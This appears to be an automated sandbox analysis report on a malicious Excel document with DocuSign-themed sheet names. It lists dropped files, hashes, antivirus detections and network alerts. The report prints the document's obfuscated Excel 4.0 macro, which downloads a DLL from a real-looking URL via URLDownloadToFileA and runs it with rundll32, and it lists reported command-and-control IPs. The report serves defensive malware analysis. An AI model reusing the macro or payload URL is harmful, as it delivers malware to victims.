                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):155530
                                                                                                                                                                                    Entropy (8bit):7.660528560276826
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXJ:YEGSzx0dmxk7RbsYsKtseoX5
                                                                                                                                                                                    MD5:580CA80638F8E187610170B9B916F1A6
                                                                                                                                                                                    SHA1:22C0E7E4869EFBBBB899C07C501F360B76A9BCD6
                                                                                                                                                                                    SHA-256:259129D6D4838E991E927B042A0460F61ABB90E78E833EFDF5F832339A9246CC
                                                                                                                                                                                    SHA-512:EDDC6C12D8E303A5937B21F0DFB02E4708A16CB57FAED8E206EA8815D239E84D8E405FDB32232A1E0054BDD9562D962AE35139953FA77942BEC8F5285F6FAC6F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\CabEABD.tmp
                                                                                                                                                                                    Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):59134
                                                                                                                                                                                    Entropy (8bit):7.995450161616763
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                    MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                    SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                    SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                    SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\TarEABE.tmp
                                                                                                                                                                                    Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):152788
                                                                                                                                                                                    Entropy (8bit):6.316654432555028
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                                                                                                                    MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                                                                                                                    SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                                                                                                                    SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                                                                                                                    SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 10:19:36 2021, atime=Sat Feb 20 10:19:36 2021, length=16384, window=hide
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):867
                                                                                                                                                                                    Entropy (8bit):4.46889222662012
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:85Q5n1LgXg/XAlCPCHaXgzB8IB/PEGgX+Wnicvbf+bDtZ3YilMMEpxRljKITdJP8:85GP/XTwz6IkYeWDv3qhrNru/
                                                                                                                                                                                    MD5:779E4D79BFB6B9A90E65743AA9697FB2
                                                                                                                                                                                    SHA1:DE951D26E777E72F62B2904EF5EA88F2B3963E65
                                                                                                                                                                                    SHA-256:286A3C533A8648DCE42D7089C2ED442E1A6B348F1320956C5D9F60D788C52581
                                                                                                                                                                                    SHA-512:E0D8C5A51EDAC95856EA83344F369747E5FD8B68E5A7EC9FF7A14C28C86D2641CBE84B75F7D52D5B8035A5396DC671288F967F569FE56E8FF62960339EE89B49
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: L..................F...........7G..).kEz...).kEz....@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TRsZ..Desktop.d......QK.XTRsZ*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\651689\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......651689..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.14349.LNK
                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 10:19:24 2021, mtime=Sat Feb 20 10:19:36 2021, atime=Sat Feb 20 10:19:36 2021, length=168448, window=hide
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2368
                                                                                                                                                                                    Entropy (8bit):4.572683374026909
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:8j/d/XT3I3HChveHCLhQh2j/d/XT3I3HChveHCLhQ/:8jl/XLI3ihLhQh2jl/XLI3ihLhQ/
                                                                                                                                                                                    MD5:2514DDDEF94E783EAAF46CEC52AA49BB
                                                                                                                                                                                    SHA1:5244D1442A2CB863E75200CC1ED7AF6CCB947A9F
                                                                                                                                                                                    SHA-256:13A5420DD8AC93A70A602CD2500697C31625BF764AD80A587CFE38CB9E5A41D6
                                                                                                                                                                                    SHA-512:21E12061C0D630EE11259A3C1B8D514E28718BAE1107D0B18C3F103395930B9DFDEDE6AD6A8A1E78AF198AC1570B598F31737B7A56F2A769A9371BE5F5EEF8BE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: L..................F.... .....#>z...).kEz...J.rEz................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TRmZ..Desktop.d......QK.XTRmZ*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TRoZ .SECURI~1.XLS.........TRmZTRmZ*...2&....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.4.3.4.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\651689\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.4.3.4.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                    Entropy (8bit):4.876408116811588
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:oyBVomM0bcsoMWgou4ouscbcsoMWgou4omM0bcsoMWgou4ov:dj60wsoMW+4VwsoMW+460wsoMW+4y
                                                                                                                                                                                    MD5:53737609850FAE6F3241AABAB5206886
                                                                                                                                                                                    SHA1:5D98430F4BA269530B66CCE97C7CF6A7605BD3D2
                                                                                                                                                                                    SHA-256:4C6E65EC2DDC6544CDC21215319A360903C27178F5FBEC101D3B23EE8F74F098
                                                                                                                                                                                    SHA-512:074A0EE29DF75C11183AA51A38C97C8631EBFEB7852EB0F2B4A37D2FC775E9824ED14292D24D158719730FCF5129F01FF680C0E13B5EF88A5C50D9C0C5DCA7F4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.14349.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.14349.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.14349.LNK=0..
                                                                                                                                                                                    C:\Users\user\BASE.BABAA
                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4591104
                                                                                                                                                                                    Entropy (8bit):5.0540147937501265
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                    MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                    SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                    SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                    SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Users\user\Desktop\57CE0000
                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):177025
                                                                                                                                                                                    Entropy (8bit):7.239945092303017
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnI:4cKoSsxzNDZLDZjlbR868O8KL5L+4iK0
                                                                                                                                                                                    MD5:284F711E4245DF9D1706EED70EB61B89
                                                                                                                                                                                    SHA1:BB3DF0DAFA04AEA74F8C5768C3FDBF7710F470C3
                                                                                                                                                                                    SHA-256:F9C84A4A89AA18C68EC569DA066C3D6B92872DBB85665184E3311123BB75608D
                                                                                                                                                                                    SHA-512:E5F0A769EA0FA2841B5AE77797D10D7540FB25F5464F4A4616BA9B63CEDC744581ABE365A6B14190A022824596F1397124C46B124F6C224B0096500732B74442
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                                                                    Entropy (8bit):7.195176543915214
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                    File name:SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls
                                                                                                                                                                                    File size:168960
                                                                                                                                                                                    MD5:7810830918f82b2acdcdb05d2d404bad
                                                                                                                                                                                    SHA1:095201dab7b66c1268e3921356a2870ad1dc628c
                                                                                                                                                                                    SHA256:c217faa8b517c65418d18c7b14ccb3c307cdbd0b477a7d09332aad25dcd52d81
                                                                                                                                                                                    SHA512:0908d69aec61aa32b134105a897c98726c2817f18faef03cf855db0d1928c8022850efd7e4b5784ab51d2faf204cd5bcfe3785974ddfc8dc0871605083240253
                                                                                                                                                                                    SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUM3:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKy
                                                                                                                                                                                    File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:e4eea286a4b4bcb4

                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                    OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls"

                                                                                                                                                                                    Indicators

                                                                                                                                                                                    Has Summary Info:True
                                                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                                                    Encrypted Document:False
                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                                                    Summary

                                                                                                                                                                                    Code Page:1251
                                                                                                                                                                                    Author:
                                                                                                                                                                                    Last Saved By:
                                                                                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                                                                                    Last Saved Time:2021-02-19 10:48:36
                                                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                                                    Security:0

                                                                                                                                                                                    Document Summary

                                                                                                                                                                                    Document Code Page:1251
                                                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                                                    Contains Dirty Links:False
                                                                                                                                                                                    Shared Document:False
                                                                                                                                                                                    Changed Hyperlinks:False
                                                                                                                                                                                    Application Version:917504

                                                                                                                                                                                    Streams

                                                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                    General
                                                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Stream Size:4096
                                                                                                                                                                                    Entropy:0.357299206868
                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                    General
                                                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Stream Size:4096
                                                                                                                                                                                    Entropy:0.247217286775
                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                                                                    General
                                                                                                                                                                                    Stream Path:Workbook
                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                    Stream Size:157800
                                                                                                                                                                                    Entropy:7.46869820242
                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                    Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                                                    ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                                                                    "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                    02/20/21-03:20:19.152823TCP2404348ET CNC Feodo Tracker Reported CnC Server TCP group 2549166443192.168.2.2294.140.114.136
                                                                                                                                                                                    02/20/21-03:21:02.841833TCP2404306ET CNC Feodo Tracker Reported CnC Server TCP group 449168443192.168.2.22142.202.191.164
                                                                                                                                                                                    02/20/21-03:21:05.665889TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 1749170443192.168.2.2245.155.173.242
                                                                                                                                                                                    02/20/21-03:21:50.785864TCP2404324ET CNC Feodo Tracker Reported CnC Server TCP group 1349173443192.168.2.22200.52.147.93
                                                                                                                                                                                    02/20/21-03:22:15.668490TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 849175443192.168.2.22182.253.107.34

                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Feb 20, 2021 03:20:08.355906963 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                    Feb 20, 2021 03:20:08.413467884 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                    Feb 20, 2021 03:20:08.413587093 CET4916580192.168.2.22185.81.0.78
